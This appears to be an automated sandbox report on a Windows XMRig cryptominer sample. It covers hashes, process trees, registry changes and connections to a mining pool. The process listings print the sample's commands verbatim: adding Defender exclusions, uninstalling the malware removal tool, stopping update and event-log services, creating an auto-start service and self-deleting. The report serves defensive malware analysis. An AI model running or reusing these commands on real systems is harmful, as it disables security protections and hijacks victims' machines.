Analysis Overview
SHA256
3ca145e7e51bbd623152e0e235a7cbc91bd37701dcc1f9c23942df064bd79d69
Threat Level: Known bad
The file 7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Creates new service(s)
Stops running service(s)
Command and Scripting Interpreter: PowerShell
UPX packed file
Executes dropped EXE
Drops file in System32 directory
Suspicious use of SetThreadContext
Launches sc.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 20:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 20:14
Reported
2024-05-22 20:17
Platform
win7-20240220-en
Max time kernel
15s
Max time network
143s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2484 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe |
| PID 2484 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe |
| PID 2484 wrote to memory of 2808 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wusa.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "ROADPDXD"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "ROADPDXD" binpath= "C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "ROADPDXD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\nslookup.exe
nslookup.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5432 | us-zephyr.miningocean.org | tcp |
Files
memory/2496-4-0x000007FEF638E000-0x000007FEF638F000-memory.dmp
memory/2496-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2496-7-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp
memory/2496-6-0x0000000001EB0000-0x0000000001EB8000-memory.dmp
memory/2496-8-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp
memory/2496-12-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp
memory/2496-11-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp
memory/2496-10-0x00000000029CB000-0x0000000002A32000-memory.dmp
memory/2496-9-0x000007FEF60D0000-0x000007FEF6A6D000-memory.dmp
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe
| MD5 | 7fa7eba4e3ea268714e420c4c1a68290 |
| SHA1 | 18da68445d1b6116e3090d2254d4c61f570f7b96 |
| SHA256 | 3ca145e7e51bbd623152e0e235a7cbc91bd37701dcc1f9c23942df064bd79d69 |
| SHA512 | e02af000d1391ef3521099176486fbc51eb85a5f2ea303db51b40b4d3598c5a868379710a4f23bfa404d73b1ada3880a06765148a08c73d23b3c395139ef72ba |
memory/2256-17-0x0000000019F00000-0x000000001A1E2000-memory.dmp
memory/2256-18-0x00000000009A0000-0x00000000009A8000-memory.dmp
memory/2200-28-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-35-0x00000000002F0000-0x0000000000310000-memory.dmp
memory/2200-34-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-37-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-40-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-39-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-36-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-38-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-33-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-31-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-29-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-32-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2200-30-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1924-25-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1924-23-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1924-22-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1924-21-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1924-20-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1924-19-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2200-42-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 20:14
Reported
2024-05-22 20:17
Platform
win10v2004-20240426-en
Max time kernel
112s
Max time network
152s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4320 set thread context of 1652 | N/A | C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe | C:\Windows\system32\conhost.exe |
| PID 4320 set thread context of 4308 | N/A | C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe | C:\Windows\system32\nslookup.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\nslookup.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "ROADPDXD"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "ROADPDXD" binpath= "C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "ROADPDXD"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\7fa7eba4e3ea268714e420c4c1a68290_NeikiAnalytics.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe
C:\ProgramData\ypsqetvlruho\kjakmqdelduq.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\nslookup.exe
nslookup.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.145:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.145:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | us-zephyr.miningocean.org | udp |
| US | 15.204.244.104:5432 | us-zephyr.miningocean.org | tcp |
| US | 8.8.8.8:53 | 104.244.204.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
